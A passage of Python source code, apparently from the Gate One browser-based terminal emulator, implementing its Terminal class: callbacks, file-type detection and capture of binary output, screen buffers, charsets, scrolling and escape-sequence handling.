CALLBACK_CHANGED: {}, CALLBACK_CURSOR_POS: {}, CALLBACK_DSR: {}, CALLBACK_TITLE: {}, CALLBACK_BELL: {}, CALLBACK_OPT: {}, CALLBACK_MODE: {}, CALLBACK_RESET: {}, CALLBACK_LEDS: {}, CALLBACK_MESSAGE: {}, } self.leds = { 1: False, 2: False, 3: False, 4: False } # supported_magic gets assigned via self.add_magic() below self.supported_magic = [] # Dict for magic "numbers" so we can tell when a particular type of # file begins and ends (so we can capture it in binary form and # later dump it out via dump_html()) # The format is 'beginning': 'whole' self.magic = OrderedDict() # magic_map is like magic except it is in the format of: # 'beginning': <filetype class> self.magic_map = {} # Supported magic (defaults) for filetype in self.enabled_filetypes: self.add_magic(filetype) # NOTE: The order matters! Some file formats are containers that can # hold other file formats. For example, PDFs can contain JPEGs. So if # we match JPEGs before PDFs we might make a match when we really wanted # to match the overall container (the PDF). self.matched_header = None # These are for saving self.screen and self.renditions so we can support # an "alternate buffer" self.alt_screen = None self.alt_renditions = None self.alt_cursorX = 0 self.alt_cursorY = 0 self.saved_cursorX = 0 self.saved_cursorY = 0 self.saved_rendition = [None] self.capture = b"" self.captured_files = {} self.file_counter = pua_counter() # This is for creating a new point of reference every time there's a new # unique rendition at a given coordinate self.rend_counter = unicode_counter() # Used for mapping unicode chars to acutal renditions (to save memory): self.renditions_store = { u' ': [], # Nada, nothing, no rendition. Not the same as below next(self.rend_counter): [0] # Default is actually reset } self.watcher = None # Placeholder for the file watcher thread (if used) def add_magic(self, filetype): """ Adds the given *filetype* to :attr:`self.supported_magic` and generates the necessary bits in :attr:`self.magic` and :attr:`self.magic_map`. *filetype* is expected to be a subclass of :class:`FileType`. """ #logging.debug("add_magic(%s)" % filetype) if filetype in self.supported_magic: return # Nothing to do; it's already there self.supported_magic.append(filetype) # Wand ready... for Type in self.supported_magic: self.magic.update({Type.re_header: Type.re_capture}) # magic_map is just a convenient way of performing magic, er, I # mean referencing filetypes that match the supported magic numbers. for Type in self.supported_magic: self.magic_map.update({Type.re_header: Type}) def remove_magic(self, filetype): """ Removes the given *filetype* from :attr:`self.supported_magic`, :attr:`self.magic`, and :attr:`self.magic_map`. *filetype* may be the specific filetype class or a string that can be either a filetype.name or filetype.mimetype. """ found = None if isinstance(filetype, basestring): for Type in self.supported_magic: if Type.name == filetype: found = Type break elif Type.mimetype == filetype: found = Type break else: for Type in self.supported_magic: if Type == filetype: found = Type break if not found: raise NotFoundError("%s not found in supported magic" % filetype) self.supported_magic.remove(Type) del self.magic[Type.re_header] del self.magic_map[Type.re_header] def update_magic(self, filetype, mimetype): """ Replaces an existing FileType with the given *mimetype* in :attr:`self.supported_magic` with the given *filetype*. 
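        Raises :class:`NotFoundError` if nothing in
        :attr:`self.supported_magic` matches the given *mimetype*.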
        Example::

            >>> import terminal
            >>> term = terminal.Terminal()
            >>> class NewPDF(terminal.PDFFile):
            ...     pass
            >>> # Open PDFs immediately in a new window
            >>> NewPDF.html_template = "<script>window.open({link})</script>"
            >>> NewPDF.html_icon_template = NewPDF.html_template # Ignore icon
            >>> term.update_magic(NewPDF, mimetype="application/pdf")
        """
        # Find the matching magic filetype
        for i, Type in enumerate(self.supported_magic):
            if Type.mimetype == mimetype:
                break
        else:
            raise NotFoundError(
                "No supported magic with mimetype %s" % mimetype)
        # Replace self.magic and self.magic_map
        del self.magic[Type.re_header]
        del self.magic_map[Type.re_header]
        self.magic.update({filetype.re_header: filetype.re_capture})
        self.magic_map.update({filetype.re_header: filetype})
        # Finally replace the existing filetype in supported_magic
        self.supported_magic[i] = filetype

    def init_screen(self):
        """
        Fills :attr:`screen` with empty lines of (unicode) spaces using
        :attr:`self.cols` and :attr:`self.rows` for the dimensions.

        .. note:: Just because each line starts out with a uniform length does
            not mean it will stay that way.  Processing of escape sequences is
            handled when an output function is called.
        """
        logging.debug('init_screen()')
        self.screen = [array('u', u' ' * self.cols) for a in xrange(self.rows)]
        # Tabstops
        self.tabstops = set(range(7, self.cols, 8))
        # Base cursor position
        self.cursorX = 0
        self.cursorY = 0
        self.rendition_set = False

    def init_renditions(self, rendition=unichr(1000)): # Match unicode_counter
        """
        Replaces :attr:`self.renditions` with arrays of *rendition*
        (characters) using :attr:`self.cols` and :attr:`self.rows` for the
        dimensions.
        """
        logging.debug(
            "init_renditions(%s)" % rendition.encode('unicode_escape'))
        # The actual renditions at various coordinates:
        self.renditions = [
            array('u', rendition * self.cols) for a in xrange(self.rows)]

    def init_scrollback(self):
        """
        Empties the scrollback buffers (:attr:`self.scrollback_buf` and
        :attr:`self.scrollback_renditions`).
        """
        self.scrollback_buf = []
        self.scrollback_renditions = []

    def add_callback(self, event, callback, identifier=None):
        """
        Attaches the given *callback* to the given *event*.  If given,
        *identifier* can be used to reference this callback later (e.g. when
        you want to remove it).  Otherwise an identifier will be generated
        automatically.  If the given *identifier* is already attached to a
        callback at the given event that callback will be replaced with
        *callback*.

            :event: The numeric ID of the event you're attaching *callback*
                to.  The :ref:`callback constants <callback_constants>` should
                be used as the numerical IDs.
            :callback: The function you're attaching to the *event*.
            :identifier: A string or number to be used as a reference point
                should you wish to remove or update this callback later.

        Returns the identifier of the callback.

        Example::

            >>> term = Terminal()
            >>> def somefunc(): pass
            >>> id = "myref"
            >>> ref = term.add_callback(term.CALLBACK_BELL, somefunc, id)

        .. note:: This allows the controlling program to have multiple
            callbacks for the same event.
        """
        if not identifier:
            identifier = callback.__hash__()
        self.callbacks[event][identifier] = callback
        return identifier

    def remove_callback(self, event, identifier):
        """
        Removes the callback referenced by *identifier* that is attached to
        the given *event*.

        Example::

            >>> term.remove_callback(CALLBACK_BELL, "myref")
        """
        del self.callbacks[event][identifier]

    def remove_all_callbacks(self, identifier):
        """
        Removes all callbacks associated with *identifier*.
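
        Example (removes the callback registered in the example above)::

            >>> term.remove_all_callbacks("myref")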
""" for event, identifiers in self.callbacks.items(): try: del self.callbacks[event][identifier] except KeyError: pass # No match, no biggie def send_message(self, message): """ A convenience function for calling all CALLBACK_MESSAGE callbacks. """ logging.debug('send_message(%s)' % message) try: for callback in self.callbacks[CALLBACK_MESSAGE].values(): callback(message) except TypeError: pass def send_update(self): """ A convenience function for calling all CALLBACK_CHANGED callbacks. """ #logging.debug('send_update()') try: for callback in self.callbacks[CALLBACK_CHANGED].values(): callback() except TypeError: pass def send_cursor_update(self): """ A convenience function for calling all CALLBACK_CURSOR_POS callbacks. """ #logging.debug('send_cursor_update()') try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def reset(self, *args, **kwargs): """ Resets the terminal back to an empty screen with all defaults. Calls :meth:`Terminal.callbacks[CALLBACK_RESET]` when finished. .. note:: If terminal output has been suspended (e.g. via ctrl-s) this will not un-suspend it (you need to issue ctrl-q to the underlying program to do that). """ logging.debug('reset()') self.leds = { 1: False, 2: False, 3: False, 4: False } self.expanded_modes = { # Important defaults '1': False, '7': False, '25': True, } self.local_echo = True self.title = "Gate One" self.esc_buffer = '' self.insert_mode = False self.rendition_set = False self.current_charset = 0 self.set_G0_charset('B') self.set_G1_charset('B') self.use_g0_charset() self.top_margin = 0 self.bottom_margin = self.rows - 1 self.alt_screen = None self.alt_renditions = None self.alt_cursorX = 0 self.alt_cursorY = 0 self.saved_cursorX = 0 self.saved_cursorY = 0 self.saved_rendition = [None] self.init_screen() self.init_renditions() self.init_scrollback() try: for callback in self.callbacks[CALLBACK_RESET].values(): callback() except TypeError: pass def __ignore(self, *args, **kwargs): """ Does nothing (on purpose!). Used as a placeholder for unimplemented functions. """ pass def resize(self, rows, cols, em_dimensions=None): """ Resizes the terminal window, adding or removing *rows* or *cols* as needed. If *em_dimensions* are provided they will be stored in *self.em_dimensions* (which is currently only used by image output). 
""" logging.debug( "resize(%s, %s, em_dimensions: %s)" % (rows, cols, em_dimensions)) if em_dimensions: self.em_dimensions = em_dimensions if rows == self.rows and cols == self.cols: return # Nothing to do--don't mess with the margins or the cursor if rows < self.rows: # Remove rows from the top for i in xrange(self.rows - rows): line = self.screen.pop(0) # Add it to the scrollback buffer so it isn't lost forever self.scrollback_buf.append(line) rend = self.renditions.pop(0) self.scrollback_renditions.append(rend) elif rows > self.rows: # Add rows at the bottom for i in xrange(rows - self.rows): line = array('u', u' ' * self.cols) renditions = array('u', unichr(1000) * self.cols) self.screen.append(line) self.renditions.append(renditions) self.rows = rows self.top_margin = 0 self.bottom_margin = self.rows - 1 # Fix the cursor location: if self.cursorY >= self.rows: self.cursorY = self.rows - 1 if cols > self.cols: # Add cols to the right for i in xrange(self.rows): for j in xrange(cols - self.cols): self.screen[i].append(u' ') self.renditions[i].append(unichr(1000)) self.cols = cols # Fix the cursor location: if self.cursorX >= self.cols: self.cursorX = self.cols - 1 self.rendition_set = False def _set_top_bottom(self, settings): """ DECSTBM - Sets :attr:`self.top_margin` and :attr:`self.bottom_margin` using the provided settings in the form of '<top_margin>;<bottom_margin>'. .. note:: This also handles restore/set "DEC Private Mode Values". """ #logging.debug("_set_top_bottom(%s)" % settings) # NOTE: Used by screen and vi so this needs to work and work well! if len(settings): if settings.startswith('?'): # This is a set/restore DEC PMV sequence return # Ignore (until I figure out what this should do) top, bottom = settings.split(';') self.top_margin = max(0, int(top) - 1) # These are 0-based if bottom: self.bottom_margin = min(self.rows - 1, int(bottom) - 1) else: # Reset to defaults (full screen margins) self.top_margin, self.bottom_margin = 0, self.rows - 1 def get_cursor_position(self): """ Returns the current cursor positition as a tuple:: (row, col) """ return (self.cursorY, self.cursorX) def set_title(self, title): """ Sets :attr:`self.title` to *title* and executes :meth:`Terminal.callbacks[CALLBACK_TITLE]` """ self.title = title try: for callback in self.callbacks[CALLBACK_TITLE].values(): callback() except TypeError as e: logging.error(_("Got TypeError on CALLBACK_TITLE...")) logging.error(repr(self.callbacks[CALLBACK_TITLE])) logging.error(e) def get_title(self): """Returns :attr:`self.title`""" return self.title # TODO: put some logic in these save/restore functions to walk the current # rendition line to come up with a logical rendition for that exact spot. def save_cursor_position(self, mode=None): """ Saves the cursor position and current rendition settings to :attr:`self.saved_cursorX`, :attr:`self.saved_cursorY`, and :attr:`self.saved_rendition` .. note:: Also handles the set/restore "Private Mode Settings" sequence. """ if mode: # Set DEC private mode # TODO: Need some logic here to save the current expanded mode # so we can restore it in _set_top_bottom(). self.set_expanded_mode(mode) # NOTE: args and kwargs are here to make sure we don't get an exception # when we're called via escape sequences. 
        self.saved_cursorX = self.cursorX
        self.saved_cursorY = self.cursorY
        self.saved_rendition = self.cur_rendition

    def restore_cursor_position(self, *args, **kwargs):
        """
        Restores the cursor position and rendition settings from
        :attr:`self.saved_cursorX`, :attr:`self.saved_cursorY`, and
        :attr:`self.saved_rendition` (if they're set).
        """
        if self.saved_cursorX and self.saved_cursorY:
            self.cursorX = self.saved_cursorX
            self.cursorY = self.saved_cursorY
            self.cur_rendition = self.saved_rendition

    def _dsr_get_cursor_position(self):
        """
        Returns the current cursor position as a DSR response in the form
        of::

            '\x1b<self.cursorY>;<self.cursorX>R'

        Also executes CALLBACK_DSR with the same output as the first argument.
        Example::

            self.callbacks[CALLBACK_DSR]('\x1b20;123R')
        """
        esc_cursor_pos = '\x1b%s;%sR' % (self.cursorY, self.cursorX)
        try:
            for callback in self.callbacks[CALLBACK_DSR].values():
                callback(esc_cursor_pos)
        except TypeError:
            pass
        return esc_cursor_pos

    def _dcs_handler(self, string=None):
        """
        Handles Device Control String sequences.  Unimplemented.  Probably not
        appropriate for Gate One.  If you believe this to be false please open
        a ticket in the issue tracker.
        """
        pass
        #print("TODO: Handle this DCS: %s" % string)

    def _set_line_params(self, param):
        """
        This function handles the control sequences that set double and single
        line heights and widths.  It also handles the "screen alignment test"
        (fill the screen with Es).

        .. note::

            Double-line height text is currently unimplemented (does anything
            actually use it?).
        """
        try:
            param = int(param)
        except ValueError:
            logging.warning(
                "Couldn't handle escape sequence #%s" % repr(param))
        if param == 8: # Screen alignment test
            self.init_renditions()
            self.screen = [
                array('u', u'E' * self.cols) for a in xrange(self.rows)]
        # TODO: Get this handling double line height stuff... For kicks

    def set_G0_charset(self, char):
        """
        Sets the terminal's G0 (default) charset to the type specified by
        *char*.

        Here are the possibilities::

            0    DEC Special Character and Line Drawing Set
            A    United Kingdom (UK)
            B    United States (USASCII)
            4    Dutch
            C    Finnish
            5    Finnish
            R    French
            Q    French Canadian
            K    German
            Y    Italian
            E    Norwegian/Danish
            6    Norwegian/Danish
            Z    Spanish
            H    Swedish
            7    Swedish
            =    Swiss
        """
        #logging.debug("Setting G0 charset to %s" % repr(char))
        try:
            self.G0_charset = self.charsets[char]
        except KeyError:
            self.G0_charset = self.charsets['B']
        if self.current_charset == 0:
            self.charset = self.G0_charset

    def set_G1_charset(self, char):
        """
        Sets the terminal's G1 (alt) charset to the type specified by *char*.

        Here are the possibilities::

            0    DEC Special Character and Line Drawing Set
            A    United Kingdom (UK)
            B    United States (USASCII)
            4    Dutch
            C    Finnish
            5    Finnish
            R    French
            Q    French Canadian
            K    German
            Y    Italian
            E    Norwegian/Danish
            6    Norwegian/Danish
            Z    Spanish
            H    Swedish
            7    Swedish
            =    Swiss
        """
        #logging.debug("Setting G1 charset to %s" % repr(char))
        try:
            self.G1_charset = self.charsets[char]
        except KeyError:
            self.G1_charset = self.charsets['B']
        if self.current_charset == 1:
            self.charset = self.G1_charset

    def use_g0_charset(self):
        """
        Sets the current charset to G0.  This should get called when ASCII_SI
        is encountered.
        """
        #logging.debug(
            #"Switching to G0 charset (which is %s)" % repr(self.G0_charset))
        self.current_charset = 0
        self.charset = self.G0_charset

    def use_g1_charset(self):
        """
        Sets the current charset to G1.  This should get called when ASCII_SO
        is encountered.
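
        A minimal sketch::

            >>> term.use_g1_charset()
            >>> term.charset is term.G1_charset
            True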
""" #logging.debug( #"Switching to G1 charset (which is %s)" % repr(self.G1_charset)) self.current_charset = 1 self.charset = self.G1_charset def abort_capture(self): """ A convenience function that takes care of canceling a file capture and cleaning up the output. """ logging.debug('abort_capture()') self.cancel_capture = True self.write(b'\x00') # This won't actually get written self.send_update() self.send_message(_(u'File capture aborted.')) def write(self, chars, special_checks=True): """ Write *chars* to the terminal at the current cursor position advancing the cursor as it does so. If *chars* is not unicode, it will be converted to unicode before being stored in self.screen. if *special_checks* is True (default), Gate One will perform checks for special things like image files coming in via *chars*. """ # NOTE: This is the slowest function in all of Gate One. All # suggestions on how to speed it up are welcome! # Speedups (don't want dots in loops if they can be avoided) specials = self.specials esc_handlers = self.esc_handlers csi_handlers = self.csi_handlers RE_ESC_SEQ = self.RE_ESC_SEQ RE_CSI_ESC_SEQ = self.RE_CSI_ESC_SEQ magic = self.magic magic_map = self.magic_map changed = False # This is commented because of how noisy it is. Uncomment to debug the # terminal emualtor: #logging.debug('handling chars: %s' % repr(chars)) # Only perform special checks (for FileTYpe stuff) if we're given bytes. # Incoming unicode chars should NOT be binary data. if not isinstance(chars, bytes): special_checks = False if special_checks: before_chars = b"" after_chars = b"" if not self.capture: for magic_header in magic: try: if magic_header.match(chars): self.matched_header = magic_header self.timeout_capture = datetime.now() self.progress_timer = datetime.now() # Create an instance of the filetype self._filetype_instance() break except UnicodeEncodeError: # Gibberish; drop it and pretend it never happened logging.debug(_( "Got UnicodeEncodeError trying to check FileTypes")) self.esc_buffer = "" # Make it so it won't barf below chars = chars.encode(self.encoding, 'ignore') if self.capture or self.matched_header: self.capture += chars if self.cancel_capture: # Try to split the garbage from the post-ctrl-c output split_capture = self.RE_SIGINT.split(self.capture) after_chars = split_capture[-1] self.capture = b'' self.matched_header = None self.cancel_capture = False self.write(u'^C\r\n', special_checks=False) self.write(after_chars, special_checks=False) return ref = self.screen[self.cursorY][self.cursorX] ft_instance = self.captured_files[ref] if ft_instance.helper: ft_instance.helper(self) now = datetime.now() if now - self.progress_timer > self.message_interval: # Send an update of the progress to the user # NOTE: This message will only get sent if it takes longer # than self.message_interval to capture a file. So it is # nice and user friendly: Small things output instantly # without notifications while larger files that take longer # to capture will keep the user abreast of the progress. ft = magic_map[self.matched_header].name indicator = 'K' size = float(len(self.capture))/1024 # Kb if size > 1024: # Switch to Mb size = size/1024 indicator = 'M' message = _( "%s: %.2f%s captured..." % (ft, size, indicator)) self.notified = True self.send_message(message) self.progress_timer = datetime.now() match = ft_instance.re_capture.search(self.capture) if match: logging.debug( "Matched %s format (%s, %s). Capturing..." 
% ( self.magic_map[self.matched_header].name, self.cursorY, self.cursorX)) split_capture = ft_instance.re_capture.split(self.capture,1) before_chars = split_capture[0] self.capture = split_capture[1] after_chars = b"".join(split_capture[2:]) if after_chars: is_container = magic_map[self.matched_header].is_container if is_container and len(after_chars) > 500: # Could be more to this file. Let's wait until output # slows down before attempting to perform a match logging.debug( "> 500 characters after capture. Waiting for more") return else: # These need to be written before the capture so that # the FileType.capture() method can position things # appropriately. if before_chars: # Empty out self.capture temporarily so these chars # get handled properly cap_temp = self.capture self.capture = b"" # This will overwrite our ref: self.write(before_chars, special_checks=False) # Put it back for the rest of the processing self.capture = cap_temp # Perform the capture and start anew self._capture_file(ref) if self.notified: # Send a final notice of how big the file was (just # to keep things consistent). ft = magic_map[self.matched_header].name indicator = 'K' size = float(len(self.capture))/1024 # Kb if size > 1024: # Switch to Mb size = size/1024 indicator = 'M' message = _( "%s: Capture complete (%.2f%s)" % ( ft, size, indicator)) self.notified = False self.send_message(message) self.capture = b"" # Empty it now that is is captured self.matched_header = None # Ditto self.write(after_chars, special_checks=True) return return # Have to convert to unicode try: chars = chars.decode(self.encoding, "handle_special") except UnicodeDecodeError: # Just in case try: chars = chars.decode(self.encoding, "ignore") except UnicodeDecodeError: logging.error( _("Double UnicodeDecodeError in terminal.Terminal.")) return except AttributeError: # In Python 3 strings don't have .decode() pass # Already Unicode for char in chars: charnum = ord(char) if charnum in specials: specials[charnum]() else: # Now handle the regular characters and escape sequences if self.esc_buffer: # We've got an escape sequence going on... try: self.esc_buffer += char # First try to handle non-CSI ESC sequences (the basics) match_obj = RE_ESC_SEQ.match(self.esc_buffer) if match_obj: seq_type = match_obj.group(1) # '\x1bA' -> 'A' # Call the matching ESC handler #logging.debug('ESC seq: %s' % seq_type) if len(seq_type) == 1: # Single-character sequnces esc_handlers[seq_type]() else: # Multi-character stuff like '\x1b)B' esc_handlers[seq_type[0]](seq_type[1:]) self.esc_buffer = '' # All done with this one continue # Next try to handle CSI ESC sequences match_obj = RE_CSI_ESC_SEQ.match(self.esc_buffer) if match_obj: csi_values = match_obj.group(1) # e.g. '0;1;37' csi_type = match_obj.group(2) # e.g. 'm' #logging.debug( #'CSI: %s, %s' % (csi_type, csi_values)) # Call the matching CSI handler try: csi_handlers[csi_type](csi_values) except ValueError: # Commented this out because it can be super noisy #logging.error(_( #"CSI Handler Error: Type: %s, Values: %s" % #(csi_type, csi_values) #)) pass self.esc_buffer = '' continue except KeyError: # No handler for this, try some alternatives if self.esc_buffer.endswith('\x1b\\'): self._osc_handler() else: logging.warning(_( "Warning: No ESC sequence handler for %s" % repr(self.esc_buffer) )) self.esc_buffer = '' continue # We're done here changed = True if self.cursorX >= self.cols: self.cursorX = 0 self.newline() # Non-autowrap has been disabled due to issues with browser # wrapping. 
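                # A sketch of what happens here: when the cursor moves past
                # the last column we always wrap to column 0 and synthesize
                # our own newline rather than honoring DECAWM (mode 7),
                # because the browser-side code handles line wrapping itself
                # (see the note above).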
                #if self.expanded_modes['7']:
                    #self.cursorX = 0
                    #self.newline()
                #else:
                    #self.screen[self.cursorY].append(u' ') # Make room
                    #self.renditions[self.cursorY].append(u' ')
                try:
                    self.renditions[self.cursorY][
                        self.cursorX] = self.cur_rendition
                    if self.insert_mode:
                        # Insert mode dictates that we move everything to the
                        # right for every character we insert.  Normally the
                        # program itself will take care of this but older
                        # programs and shells will simply call ESC[4h, insert
                        # the character, then call ESC[4l to return the
                        # terminal to its regular state.
                        self.insert_characters(1)
                    if charnum in self.charset:
                        char = self.charset[charnum]
                        self.screen[self.cursorY][self.cursorX] = char
                    else:
                        # Double check this isn't a unicode diacritic (accent)
                        # which simply modifies the character before it
                        if unicodedata.combining(char):
                            # This is a diacritic.  Combine it with existing:
                            current = self.screen[self.cursorY][self.cursorX]
                            combined = unicodedata.normalize(
                                'NFC', u'%s%s' % (current, char))
                            # Sometimes a joined combining char can still
                            # result in a string of length > 1.  So we need to
                            # handle that
                            if len(combined) > 1:
                                for i, c in enumerate(combined):
                                    self.screen[self.cursorY][
                                        self.cursorX] = c
                                    if i < len(combined) - 1:
                                        self.cursorX += 1
                            else:
                                self.screen[self.cursorY][
                                    self.cursorX] = combined
                        else:
                            # Normal character
                            self.screen[self.cursorY][self.cursorX] = char
                except IndexError as e:
                    # This can happen when escape sequences go haywire
                    # Only log the error if debugging is enabled (because we
                    # really don't care that much 99% of the time)
                    logger = logging.getLogger()
                    if logger.level < 20:
                        logging.error(_(
                            "IndexError in write(): %s" % e))
                        import traceback, sys
                        traceback.print_exc(file=sys.stdout)
                self.cursorX += 1
                #self.cursor_right()
            self.prev_char = char
        if changed:
            self.modified = True
            # Execute our callbacks
            self.send_update()
            self.send_cursor_update()

    def flush(self):
        """
        Only here to make Terminal compatible with programs that want to use
        file-like methods.
        """
        pass

    def scroll_up(self, n=1):
        """
        Scrolls up the terminal screen by *n* lines (default: 1).  The
        callbacks CALLBACK_CHANGED and CALLBACK_SCROLL_UP are called after
        scrolling the screen.

        .. note::

            This will only scroll up the region within `self.top_margin` and
            `self.bottom_margin` (if set).
        """
        #logging.debug("scroll_up(%s)" % n)
        empty_line = array('u', u' ' * self.cols) # Line full of spaces
        empty_rend = array('u', unichr(1000) * self.cols)
        for x in xrange(int(n)):
            line = self.screen.pop(self.top_margin) # Remove the top line
            self.scrollback_buf.append(line) # Add it to the scrollback buffer
            if len(self.scrollback_buf) > self.max_scrollback:
                self.init_scrollback()
                # NOTE: This would only be the # of lines piled up before the
                # next dump_html() or dump().
            # Add it to the bottom of the window:
            self.screen.insert(self.bottom_margin, empty_line[:]) # A copy
            # Remove top line's rendition information
            rend = self.renditions.pop(self.top_margin)
            self.scrollback_renditions.append(rend)
            # Insert a new empty rendition as well:
            self.renditions.insert(self.bottom_margin, empty_rend[:])
        # Execute our callback indicating lines have been updated
        try:
            for callback in self.callbacks[CALLBACK_CHANGED].values():
                callback()
        except TypeError:
            pass
        # Execute our callback to scroll up the screen
        try:
            for callback in self.callbacks[CALLBACK_SCROLL_UP].values():
                callback()
        except TypeError:
            pass

    def scroll_down(self, n=1):
        """
        Scrolls down the terminal screen by *n* lines (default: 1).
        The callbacks CALLBACK_CHANGED and CALLBACK_SCROLL_DOWN are called
        after scrolling the screen.
        """
        #logging.debug("scroll_down(%s)" % n)
        for x in xrange(int(n)):
            self.screen.pop(self.bottom_margin) # Remove the bottom line
            empty_line = array('u', u' ' * self.cols) # Line full of spaces
            self.screen.insert(self.top_margin, empty_line) # Add it to the top
            # Remove bottom line's style information:
            self.renditions.pop(self.bottom_margin)
            # Insert a new empty one:
            empty_line = array('u', unichr(1000) * self.cols)
            self.renditions.insert(self.top_margin, empty_line)
        # Execute our callback indicating lines have been updated
        try:
            for callback in self.callbacks[CALLBACK_CHANGED].values():
                callback()
        except TypeError:
            pass
        # Execute our callback to scroll up the screen
        try:
            for callback in self.callbacks[CALLBACK_SCROLL_UP].values():
                callback()
        except TypeError:
            pass

    def insert_line(self, n=1):
        """
        Inserts *n* lines at the current cursor position.
        """
        #logging.debug("insert_line(%s)" % n)
        if not n: # Takes care of an empty string
            n = 1
        n = int(n)
        for i in xrange(n):
            self.screen.pop(self.bottom_margin) # Remove the bottom line
            # Remove bottom line's style information as well:
            self.renditions.pop(self.bottom_margin)
            empty_line = array('u', u' ' * self.cols) # Line full of spaces
            self.screen.insert(self.cursorY, empty_line) # Insert at cursor
            # Insert a new empty rendition as well:
            empty_rend = array('u', unichr(1000) * self.cols)
            self.renditions.insert(self.cursorY, empty_rend) # Insert at cursor

    def delete_line(self, n=1):
        """
        Deletes *n* lines at the current cursor position.
        """
        #logging.debug("delete_line(%s)" % n)
        if not n: # Takes care of an empty string
            n = 1
        n = int(n)
        for i in xrange(n):
            self.screen.pop(self.cursorY) # Remove the line at the cursor
            # Remove the line's style information as well:
            self.renditions.pop(self.cursorY)
            # Now add an empty line and empty set of renditions to the bottom
            # of the view
            empty_line = array('u', u' ' * self.cols) # Line full of spaces
            # Add it to the bottom of the view:
            self.screen.insert(self.bottom_margin, empty_line) # At bottom
            # Insert a new empty rendition as well:
            empty_rend = array('u', unichr(1000) * self.cols)
            self.renditions.insert(self.bottom_margin, empty_rend)

    def backspace(self):
        """Execute a backspace (\\x08)"""
        self.cursor_left(1)

    def horizontal_tab(self):
        """Execute horizontal tab (\\x09)"""
        for stop in sorted(self.tabstops):
            if self.cursorX < stop:
                self.cursorX = stop + 1
                break
        else:
            self.cursorX = self.cols - 1

    def _set_tabstop(self):
        """Sets a tabstop at the current position of :attr:`self.cursorX`."""
        if self.cursorX not in self.tabstops:
            for tabstop in self.tabstops:
                if self.cursorX > tabstop:
                    self.tabstops.add(self.cursorX)
                    break

    def linefeed(self):
        """
        LF - Executes a line feed.

        .. note:: This actually just calls :meth:`Terminal.newline`.
        """
        self.newline()

    def next_line(self):
        """
        CNL - Moves the cursor down one line to the home position.  Will not
        result in a scrolling event like newline() does.

        .. note::

            This is not the same thing as :meth:`Terminal.cursor_next_line`
            which preserves the cursor's column position.
        """
        self.cursorX = 0 # Home position
        if self.cursorY < self.rows - 1:
            self.cursorY += 1

    def reverse_linefeed(self):
        """
        RI - Executes a reverse line feed: Move the cursor up one line to the
        home position.  If the cursor move would result in going past the top
        margin of the screen (upwards) this will execute a scroll_down()
        event.
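
        A sketch: if the cursor is already sitting on the top margin, this
        triggers :meth:`scroll_down` and the cursor stays on that margin::

            >>> term.cursorY = term.top_margin
            >>> term.reverse_linefeed() # Scrolls down; cursorY == top_margin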
""" self.cursorX = 0 self.cursorY -= 1 if self.cursorY < self.top_margin: self.scroll_down() self.cursorY = self.top_margin def newline(self): """ Increases :attr:`self.cursorY` by 1 and calls :meth:`Terminal.scroll_up` if that action will move the curor past :attr:`self.bottom_margin` (usually the bottom of the screen). """ cols = self.cols self.cursorY += 1 if self.cursorY > self.bottom_margin: self.scroll_up() self.cursorY = self.bottom_margin self.clear_line() # Shorten the line if it is longer than the number of columns # NOTE: This lets us keep the width of existing lines even if the number # of columns is reduced while at the same time accounting for apps like # 'top' that merely overwrite existing lines. If we didn't do this # the output from 'top' would get all messed up from leftovers at the # tail end of every line when self.cols had a larger value. if len(self.screen[self.cursorY]) >= cols: self.screen[self.cursorY] = self.screen[self.cursorY][:cols] self.renditions[self.cursorY] = self.renditions[self.cursorY][:cols] # NOTE: The above logic is placed inside of this function instead of # inside self.write() in order to reduce CPU utilization. There's no # point in performing a conditional check for every incoming character # when the only time it will matter is when a newline is being written. def carriage_return(self): """ Executes a carriage return (sets :attr:`self.cursorX` to 0). In other words it moves the cursor back to position 0 on the line. """ if self.cursorX == 0: return # Nothing to do if divmod(self.cursorX, self.cols+1)[1] == 0: # A carriage return at the precise end of line means the program is # assuming vt100-style autowrap. Since we let the browser handle # that we need to discard this carriage return since we're not # actually making a newline. if self.prev_char not in [u'\x1b', u'\n']: # These are special cases where the underlying shell is assuming # autowrap so we have to emulate it. self.newline() else: return if not self.capture: self.cursorX = 0 def _xon(self): """ Handles the XON character (stop ignoring). .. note:: Doesn't actually do anything (this feature was probably meant for the underlying terminal program). """ logging.debug('_xon()') self.local_echo = True def _xoff(self): """ Handles the XOFF character (start ignoring) .. note:: Doesn't actually do anything (this feature was probably meant for the underlying terminal program). """ logging.debug('_xoff()') self.local_echo = False def _cancel_esc_sequence(self): """ Cancels any escape sequence currently being processed. In other words it empties :attr:`self.esc_buffer`. """ self.esc_buffer = '' def _sub_esc_sequence(self): """ Cancels any escape sequence currently in progress and replaces :attr:`self.esc_buffer` with single question mark (?). .. note:: Nothing presently uses this function and I can't remember what it was supposed to be part of (LOL!). Obviously it isn't very important. """ self.esc_buffer = '' self.write('?') def _escape(self): """ Handles the escape character as well as escape sequences that may end with an escape character. """ buf = self.esc_buffer if buf.startswith('\x1bP') or buf.startswith('\x1b]'): # CSRs and OSCs are special self.esc_buffer += '\x1b' else: # Get rid of whatever's there since we obviously didn't know what to # do with it self.esc_buffer = '\x1b' def _csi(self): """ Marks the start of a CSI escape sequence (which is itself a character) by setting :attr:`self.esc_buffer` to '\\\\x1b[' (which is the CSI escape sequence). 
""" self.esc_buffer = '\x1b[' def _filetype_instance(self): """ Instantiates a new instance of the given :class:`FileType` (using `self.matched_header`) and stores the result in `self.captured_files` and creates a reference to that location at the current cursor location. """ ref = self.file_counter.next() logging.debug("_filetype_instance(%s)" % repr(ref)) # Before doing anything else we need to mark the current cursor # location as belonging to our file self.screen[self.cursorY][self.cursorX] = ref # Create an instance of the filetype we can reference filetype_instance = self.magic_map[self.matched_header]( path=self.temppath, linkpath=self.linkpath, icondir=self.icondir) self.captured_files[ref] = filetype_instance def _capture_file(self, ref): """ This function gets called by :meth:`Terminal.write` when the incoming character stream matches a value in :attr:`self.magic`. It will call whatever function is associated with the matching regex in :attr:`self.magic_map`. It also stores the current file capture reference (*ref*) at the current cursor location. """ logging.debug("_capture_file(%s)" % repr(ref)) self.screen[self.cursorY][self.cursorX] = ref filetype_instance = self.captured_files[ref] filetype_instance.capture(self.capture, self) # Start up an open file watcher so leftover file objects get # closed when they're no longer being used if not self.watcher or not self.watcher.isAlive(): import threading self.watcher = threading.Thread( name='watcher', target=self._captured_fd_watcher) self.watcher.setDaemon(True) self.watcher.start() return def _captured_fd_watcher(self): """ Meant to be run inside of a thread, calls :meth:`Terminal.close_captured_fds` until there are no more open image file descriptors. """ logging.debug("starting _captured_fd_watcher()") 